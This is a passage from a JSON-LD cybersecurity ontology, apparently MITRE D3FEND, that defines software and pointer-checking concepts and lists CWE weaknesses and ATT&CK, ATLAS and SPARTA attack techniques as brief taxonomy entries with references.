      "d3f:implements": {
        "@id": "d3f:Subroutine"
      },
      "d3f:instructs": {
        "@id": "d3f:Process"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Software"
      },
      "rdfs:label": "Software",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:Nf40ef92910c2430bbc057a0200d44028"
        },
        {
          "@id": "_:N43c7556db15349029ab71c88afe8f91e"
        },
        {
          "@id": "_:N51414aec72e04c07862ede7545ee2f78"
        }
      ]
    },
    {
      "@id": "_:Nf40ef92910c2430bbc057a0200d44028",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N43c7556db15349029ab71c88afe8f91e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implements"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "_:N51414aec72e04c07862ede7545ee2f78",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:NullPointerChecking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-NPC",
      "d3f:definition": "Checking if a pointer is NULL.",
      "d3f:hardens": [
        {
          "@id": "d3f:MemoryFreeFunction"
        },
        {
          "@id": "d3f:PointerDereferencingFunction"
        }
      ],
      "d3f:kb-article": "\n## How it Works\nProgrammatically checking if a pointer is NULL before use.\n\n## Considerations\n* Pointers should be checked prior to use after they have, or may have been modified.\n* Note that it may vary by circumstance whether the caller, or callee is responsible for checking if a pointer is NULL.\n* Note: This resource should not be considered a definitive or exhaustive coding guideline.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-NullPointerChecking_SEI"
        },
        {
          "@id": "d3f:Reference-NullPointerDereference_CWE"
        },
        {
          "@id": "d3f:Reference-PointerValidationFunction_SEI"
        }
      ],
      "d3f:synonym": "Nil Pointer Checking",
      "rdfs:label": "Null Pointer Checking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PointerValidation"
        },
        {
          "@id": "_:N05721ec2ecad4761a77ff352849d59ba"
        },
        {
          "@id": "_:N10cae582e3304b049774edb22b0e5756"
        }
      ]
    },
    {
      "@id": "_:N05721ec2ecad4761a77ff352849d59ba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "_:N10cae582e3304b049774edb22b0e5756",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PointerDereferencingFunction"
      }
    },
    {
      "@id": "d3f:CWE-454",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-454",
      "d3f:definition": "The product initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.",
      "rdfs:label": "External Initialization of Trusted Variables or Data Stores",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1419"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:accesses",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x accesses y: The subject x takes the action of reading from, writing into, or executing the stored information in the object y. Reads, writes, and executes are specific cases of accesses.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02673854-n"
      },
      "rdfs:label": "accesses",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-access"
        }
      ]
    },
    {
      "@id": "d3f:AML.TA0007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0007",
      "d3f:definition": "The adversary is trying to avoid being detected by AI-enabled security software.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise.\nTechniques used for defense evasion include evading AI-enabled security software such as malware detectors.",
      "rdfs:label": "Defense Evasion - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0007"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Defense Evasion"
    },
    {
      "@id": "d3f:T1031",
      "@type": "owl:Class",
      "d3f:attack-id": "T1031",
      "d3f:definition": "Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1543.003",
      "rdfs:label": "Modify Existing Service",
      "rdfs:seeAlso": {
        "@id": "d3f:T1543.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:T1603",
      "@type": "owl:Class",
      "d3f:attack-id": "T1603",
      "d3f:definition": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.",
      "rdfs:label": "Scheduled Task/Job - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileExecutionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Scheduled Task/Job"
    },
    {
      "@id": "d3f:CWE-155",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-155",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as wildcards or matching symbols when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Wildcards or Matching Symbols",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:PER-0002.01",
      "@type": "owl:Class",
      "d3f:attack-id": "PER-0002.01",
      "d3f:definition": "Hardware backdoors leverage properties of the physical design to provide durable, low-visibility reentry. Examples include enabled test/scan chains, manufacturing or boot-strap modes invoked by pins or registers, persistent debug interfaces (JTAG/SWD/UART), undocumented device commands, and logic inserted in FPGA/ASIC designs that activates under specific stimuli. Because these mechanisms sit below or beside flight software, they can grant direct access to buses, memories, or peripheral control even when higher layers appear healthy. Triggers may be electrical (pin states, voltage/clock sequences), protocol-level (special patterns on an instrument link), or environmental/temporal (particular temperature ranges, timing offsets). Once on orbit, such pathways are difficult to remove or reconfigure, allowing the attacker to persist by reusing the same physical entry points whenever conditions are met.",
      "rdfs:label": "Hardware Backdoor - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0002/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PER-0002"
      },
      "skos:prefLabel": "Hardware Backdoor"
    },
    {
      "@id": "d3f:CWE-774",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-774",
      "d3f:definition": "The product allocates file descriptors or handles on behalf of an actor without imposing any restrictions on how many descriptors can be allocated, in violation of the intended security policy for that actor.",
      "d3f:synonym": "File Descriptor Exhaustion",
      "rdfs:label": "Allocation of File Descriptors or Handles Without Limits or Throttling",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-770"
      }
    },
    {
      "@id": "d3f:Reference-MGT516ManagingSecurityVulnerabilitiesEnterpriseAndCloud",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.sans.org/cyber-security-courses/managing-enterprise-cloud-security-vulnerabilities/"
      },
      "d3f:kb-abstract": "Vulnerability, patch, and configuration management are not new security topics. In fact, they are some of the oldest security functions. Yet, we still struggle to manage these capabilities effectively. The quantity of outstanding vulnerabilities for most large organizations is overwhelming, and all organizations struggle to keep up with the never-ending onslaught of new vulnerabilities in their infrastructure and applications. When you add in the cloud and the increasing speed with which all organizations must deliver systems, applications, and features to both their internal and external customers, security may seem unachievable. This course will show you the most effective ways to mature your vulnerability management program and move from identifying vulnerabilities to successfully treating them. 16 Cyber42 and lab exercises",
      "d3f:kb-author": "Jonathan Risto and David Hazar",
      "d3f:kb-organization": "SANS",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalRiskAssessment"
      },
      "d3f:kb-reference-title": "MGT516: Managing Security Vulnerabilities: Enterprise and Cloud",
      "rdfs:label": "Reference - MGT516: Managing Security Vulnerabilities: Enterprise and Cloud"
    },
    {
      "@id": "d3f:CCI-001493_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit tools from unauthorized access.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001493"
    },
    {
      "@id": "d3f:REC-0003.04",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0003.04",
      "d3f:definition": "Adversaries seek any credential that would let them authenticate as a legitimate actor in space, ground, or supporting cloud networks. Targets include TT&C authentication keys and counters, link-encryption keys, PN codes or spreading sequences, modem and gateway accounts, mission control mission control user and service accounts, station control credentials, VPN and identity-provider tokens, SLE/CSP service credentials, maintenance backdoor accounts, and automation secrets embedded in scripts or CI/CD pipelines. Acquisition paths include spear-phishing, supply-chain compromise, credential reuse across dev/test/ops, logs and core dumps, misconfigured repositories, contractor laptops, and improperly sanitized training data. Because some missions authenticate uplink without encrypting it, possession of valid keys or counters may be sufficient to issue accepted commands from outside official channels.",
      "rdfs:label": "Valid Credentials - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0003/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0003"
      },
      "skos:prefLabel": "Valid Credentials"
    },
    {
      "@id": "d3f:CWE-118",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-118",
      "d3f:definition": "The product does not restrict or incorrectly restricts operations within the boundaries of a resource that is accessed using an index or pointer, such as memory or files.",
      "rdfs:label": "Incorrect Access of Indexable Resource ('Range Error')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:PlatformUptime",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A variable that notes the amount of time a platform has been running since its last power cycle or reset.",
      "rdfs:comment": "In OT controllers this may not be a default tag rather something that should be defined using other system tags.",
      "rdfs:label": "Platform Uptime",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:Software-definedRadioWaveformApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software implementation of a radio waveform that executes on the programmable processing elements of a software-defined radio and realizes the signal processing functions necessary to transmit and receive a specific radio signal. On peripheral SDRs, this can take the form of a compiled flowgraph that runs on the host PC, whereas in stand-alone SDRs it may be an FPGA bitstream or waveform package that executes on the SDR's processing elements.",
      "d3f:may-contain": {
        "@id": "d3f:FPGABitstream"
      },
      "d3f:synonym": [
        "SDR waveform",
        "Waveform Software"
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://media.defense.gov/2020/Feb/13/2002249005/-1/-1/1/SCA_4.1_SCASPECIFICATION.PDF"
      },
      "rdfs:label": "Software-defined Radio Waveform Application",
      "rdfs:seeAlso": {
        "@id": "https://ieeexplore.ieee.org/document/5768314"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalSignalProcessingApplication"
        },
        {
          "@id": "_:N666864940d5547c8b6f878d214e1d665"
        }
      ]
    },
    {
      "@id": "_:N666864940d5547c8b6f878d214e1d665",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FPGABitstream"
      }
    },
    {
      "@id": "d3f:NetworkConnectionRefuseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network connection is refused.",
      "rdfs:label": "Network Connection Refuse Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkConnectionEvent"
      }
    },
    {
      "@id": "d3f:NonlinearRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NR",
      "d3f:definition": "Nonlinear regression is a form of regression analysis in which observational data are modeled by a function which is a nonlinear combination of the model parameters and depends on one or more independent variables.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Nonlinear regression. [Link](https://en.wikipedia.org/wiki/Nonlinear_regression)",
      "rdfs:label": "Nonlinear Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysis"
      }
    },
    {
      "@id": "d3f:AML.T0090",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0090",
      "d3f:definition": "Adversaries may extract credentials from OS caches, application memory, or other sources on a compromised system. Credentials are often in the form of a hash or clear text, and can include usernames and passwords, application tokens, or other authentication keys.\n\nCredentials can be used to perform [Lateral Movement](/tactics/AML.TA0015) to access other AI services such as AI agents, LLMs, or AI inference APIs. Credentials could also give an adversary access to other software tools and data sources that are part of the AI DevOps lifecycle.",
      "rdfs:label": "OS Credential Dumping - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0090"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCredentialAccessTechnique"
      },
      "skos:prefLabel": "OS Credential Dumping"
    },
    {
      "@id": "d3f:T1213.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1213.006",
      "d3f:definition": "Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments).",
      "rdfs:label": "Databases",
      "rdfs:subClassOf": {
        "@id": "d3f:T1213"
      }
    },
    {
      "@id": "d3f:CWE-622",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-622",
      "d3f:definition": "The product adds hooks to user-accessible API functions, but it does not properly validate the arguments. This could lead to resultant vulnerabilities.",
      "rdfs:label": "Improper Validation of Function Hook Arguments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:CWE-1042",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1042",
      "d3f:definition": "The code contains a member element that is declared as static (but not final), in which its parent class element is not a singleton class - that is, a class element that can be used only once in the 'to' association of a Create action.",
      "rdfs:label": "Static Member Data Element outside of a Singleton Class Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1176"
      }
    },
    {
      "@id": "d3f:UserBehavior",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:UserAction"
      },
      "d3f:definition": "A user behavior is a pattern of user actions, or set of such patterns. Modeling and analyzing these patterns and monitoring a users actions for meaningful anomalies is known as user behavior analytics (UBA).",
      "rdfs:label": "User Behavior",
      "rdfs:seeAlso": {
        "@id": "dbr:User_behavior_analytics"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Nace89108311846bc8f6a723a5ed28550"
        }
      ]
    },
    {
      "@id": "_:Nace89108311846bc8f6a723a5ed28550",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAction"
      }
    },
    {
      "@id": "d3f:TA0102",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Discovery - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Discovery"
    },
    {
      "@id": "d3f:T1218.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.003",
      "d3f:definition": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:may-produce": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "CMSTP",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:Neead9b2285a245e6934ccecb3fd45721"
        },
        {
          "@id": "_:Na7ac9a24cc0a42de9a0b76210b545c3e"
        }
      ]
    },
    {
      "@id": "_:Neead9b2285a245e6934ccecb3fd45721",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:Na7ac9a24cc0a42de9a0b76210b545c3e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-1239",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1239",
      "d3f:definition": "The hardware product does not properly clear sensitive information from built-in registers when the user of the hardware block changes.",
      "rdfs:label": "Improper Zeroization of Hardware Register",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-226"
      }
    },
    {
      "@id": "d3f:CWE-447",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-447",
      "d3f:definition": "A UI function for a security feature appears to be supported and gives feedback to the user that suggests that it is supported, but the underlying functionality is not implemented.",
      "rdfs:label": "Unimplemented or Unsupported Feature in UI",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-446"
        },
        {
          "@id": "d3f:CWE-671"
        }
      ]
    },
    {
      "@id": "d3f:CWE-39",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-39",
      "d3f:definition": "The product accepts input that contains a drive letter or Windows volume letter ('C:dirname') that potentially redirects access to an unintended location or arbitrary file.",
      "rdfs:label": "Path Traversal: 'C:dirname'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-36"
      }
    },
    {
      "@id": "d3f:T1557",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1557",
      "d3f:definition": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)",
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Adversary-in-the-Middle",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N7ffa6da5d0c7440eaa11d0e8ba22654e"
        }
      ]
    },
    {
      "@id": "_:N7ffa6da5d0c7440eaa11d0e8ba22654e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-113",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-113",
      "d3f:definition": "The product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.",
      "d3f:synonym": [
        "HTTP Request Splitting",
        "HTTP Response Splitting"
      ],
      "rdfs:label": "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-436"
        },
        {
          "@id": "d3f:CWE-93"
        }
      ]
    },
    {
      "@id": "d3f:Reference-FirewallForInterentAccess_SecureComputingLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/GB2317539A"
      },
      "d3f:kb-abstract": "Regulating the flow of internetwork connections through a firewall (10) having a network protocol stack (14,16,18) which includes an Internet Protocol (IP) layer (16). A determination is made of the parameters characteristic of a connection request, including a netelement parameter characteristic of where the connection request came from. A query is generated and a determination is made whether there is a rule corresponding to that query. If there is a rule corresponding to the query, a determination is made whether authentication is required by the rule. If authentication is required by the rule, an authentication protocol is activated and the connection is activated if the authentication protocol is completed successfully.",
      "d3f:kb-author": "Edward B Stockwell, Alan E Klietz",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Secure Computing LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Firewall for interent access",
      "rdfs:label": "Reference - Firewall for interent access - Secure Computing LLC"
    },
    {
      "@id": "d3f:isolates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x isolates y: The technique or agent x sets digital artifact y apart from other digital artifacts, sequestering y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00496744-v"
      },
      "rdfs:label": "isolates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:d3fend-tactical-verb-property"
        }
      ]
    },
    {
      "@id": "d3f:Reference-IEEE-802_1AB-2016",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://standards.ieee.org/ieee/802.1AB/6047/"
      },
      "d3f:kb-organization": "IEEE",
      "d3f:kb-reference-of": {
        "@id": "d3f:HardwareComponentInventory"
      },
      "d3f:kb-reference-title": "IEEE Standard for Local and Metropolitan Area Networks - Station and Media Access Control Connectivity Discovery",
      "rdfs:label": "Reference - IEEE Standard for Local and Metropolitan Area Networks - Station and Media Access Control Connectivity Discovery"
    },
    {
      "@id": "d3f:Reference-CAR-2021-04-001%3ACommonWindowsProcessMasquerading_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-04-001/"
      },
      "d3f:kb-abstract": "Masquerading (T1036) is defined by ATT&CK as follows:\n\n“Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.”\n\nMalware authors often use this technique to hide malicious executables behind legitimate Windows executable names (e.g. lsass.exe, svchost.exe, etc).\n\nThere are several sub-techniques, but this analytic focuses on Match Legitimate Name or Location only.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-04-001: Common Windows Process Masquerading",
      "rdfs:label": "Reference - CAR-2021-04-001: Common Windows Process Masquerading - MITRE"
    },
    {
      "@id": "d3f:HardwareDeviceStateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving a change to a device's state, such as connection, disconnection, modification, or operational state transitions (e.g., online or offline). Device state events provide visibility into device availability and operational conditions.",
      "rdfs:label": "Hardware Device State Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceEvent"
      }
    },
    {
      "@id": "d3f:AsymmetricKey",
      "@type": "owl:Class",
      "d3f:definition": "Asymmetric keys are public and private keys, paired such that asymmetric (public-key) cryptography algorithms can be implemented using them. Public-key cryptography, or asymmetric cryptography, is any cryptographic system that uses pairs of keys: public keys that may be disseminated widely paired with private keys which are known only to the owner. There are two functions that can be achieved: using a public key to authenticate that a message originated with a holder of the paired private key; or encrypting a message with a public key to ensure that only the holder of the paired private key can decrypt it.",
      "rdfs:label": "Asymmetric Key",
      "rdfs:seeAlso": {
        "@id": "dbr:Public-key_cryptography"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CryptographicKey"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-006%3AUnusualChildProcessSpawnedUsingDDEExploit_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-006/"
      },
      "d3f:kb-abstract": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-006: Unusual Child Process spawned using DDE exploit",
      "rdfs:label": "Reference - CAR-2021-01-006: Unusual Child Process spawned using DDE exploit - MITRE"
    },
    {
      "@id": "d3f:CWE-588",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-588",
      "d3f:definition": "Casting a non-structure type to a structure type and accessing a field can lead to memory access errors or data corruption.",
      "rdfs:label": "Attempt to Access Child of a Non-structure Pointer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-704"
        },
        {
          "@id": "d3f:CWE-758"
        }
      ]
    },
    {
      "@id": "d3f:T1572",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1572",
      "d3f:definition": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Protocol Tunneling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N36212f17bc0e4a37b98553419f111838"
        }
      ]
    },
    {
      "@id": "_:N36212f17bc0e4a37b98553419f111838",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:WideAreaNetwork",
      "@type": "owl:Class",
      "d3f:definition": "By contrast to a local area network (LAN), a wide area network (WAN), not only covers a larger geographic distance, but also generally involves leased telecommunication circuits or Internet links.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Local_area_network"
      },
      "rdfs:label": "Wide Area Network",
      "rdfs:subClassOf": {
        "@id": "d3f:Network"
      },
      "skos:altLabel": "WAN"
    },
    {
      "@id": "d3f:updates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x updates y: The technique x updates the software for component y.",
      "rdfs:label": "updates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:hardens"
        },
        {
          "@id": "d3f:modifies"
        }
      ]
    },
    {
      "@id": "d3f:ElectromagneticSignal",
      "@type": "owl:Class",
      "d3f:definition": "An electromagnetic wave that carries information.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Signal"
      },
      "rdfs:label": "Electromagnetic Signal",
      "rdfs:subClassOf": {
        "@id": "d3f:Signal"
      }
    },
    {
      "@id": "d3f:CWE-359",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-359",
      "d3f:definition": "The product does not properly prevent a person's private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected.",
      "d3f:synonym": [
        "Privacy leak",
        "Privacy leakage",
        "Privacy violation"
      ],
      "rdfs:label": "Exposure of Private Personal Information to an Unauthorized Actor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:DecisionTreeRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DTR",
      "d3f:definition": "Decision Trees Regression is asupervised learning method with the goal  to create a model that predicts the value of a target variable by learning simple decision rules inferred from the data features",
      "d3f:kb-article": "## References\nscikit-learn. (n.d.). Decision Trees. [Link](https://scikit-learn.org/stable/modules/tree.html#tree)",
      "rdfs:label": "Decision Tree Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:HardwareDeviceUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing updates or changes to a device's configuration, properties, or state, including firmware updates, reconfigurations, or optimizations.",
      "rdfs:label": "Hardware Device Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceStateEvent"
        },
        {
          "@id": "_:N7756a2f5dc524a25aa579e1e74512cec"
        }
      ]
    },
    {
      "@id": "_:N7756a2f5dc524a25aa579e1e74512cec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
